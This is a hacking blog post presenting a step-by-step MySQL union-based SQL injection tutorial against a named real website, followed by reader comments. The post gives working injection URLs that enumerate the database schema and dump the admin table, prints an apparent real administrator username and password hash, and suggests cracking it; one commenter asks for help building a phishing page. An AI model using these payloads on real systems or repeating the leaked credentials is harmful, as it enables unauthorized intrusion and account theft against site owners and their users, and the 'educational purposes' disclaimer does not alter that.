Learn How Hackers Hack Websites MYSQL Injection Tutorial


    - SQL Injection -
This Article Is About how to Hack a website with SQL Injection.I and stealthhackroom.blogspot.com Takes No responsibility for it,s misuse.ok.

we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end 
http://www.allaboutcar.net/articles.php?topic=3'\
it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

do that untill u get a error

It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

that mean it only has 5 columns ..  because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select 

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5

5.0.67

ok now .. 

let get the table names.. to do that u need to use this commands

group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables

http://www.allaboutcar.net/articles.php?topic=-3 
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins

,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,

infopages,

jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3 
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns 

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,

date,id,title,

alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,

mail,title,

text,ip,

id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
This Tutorial Is Only For Educational Purposes.
So Friends that all for this tutorial
Username : MaTySeK, 

Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253

8 comments:

Prateek said...

where to put username and password ??

max said...

Is there any way to lock the USB port so that no one can transfer data in absence.

Regards..

Ankit said...

i don't get the command union select

what do you mean by there should be number pop up somewhere

should i have to put the number 1,2,3,4,5-- in a series or i have to put the number 1 by 1 to check
it

by putting 1 by 1 i get an error on whole numbers 1,2,3,4,5

by putting the number in a series how should know the pop up number????

plese tell me

KARTHIKEYAN said...

Please tell how to Inject in Stored Procedure..
I heard that it is very hard to inject. Is it So

Love said...

k i ill try

ashok said...

The used SELECT statements have a different number of columns

ashok said...

when execute this script above mention error showing

select * from xyz where id=1 union select 1 ,group_concat(table_name),1 from information_schema.tables where table_schema=database()--

Jimmy Jason said...

I want to make a phishing page can you help me out with this contact me at jimmyjason63@gmail.com

Post a Comment

Sponsers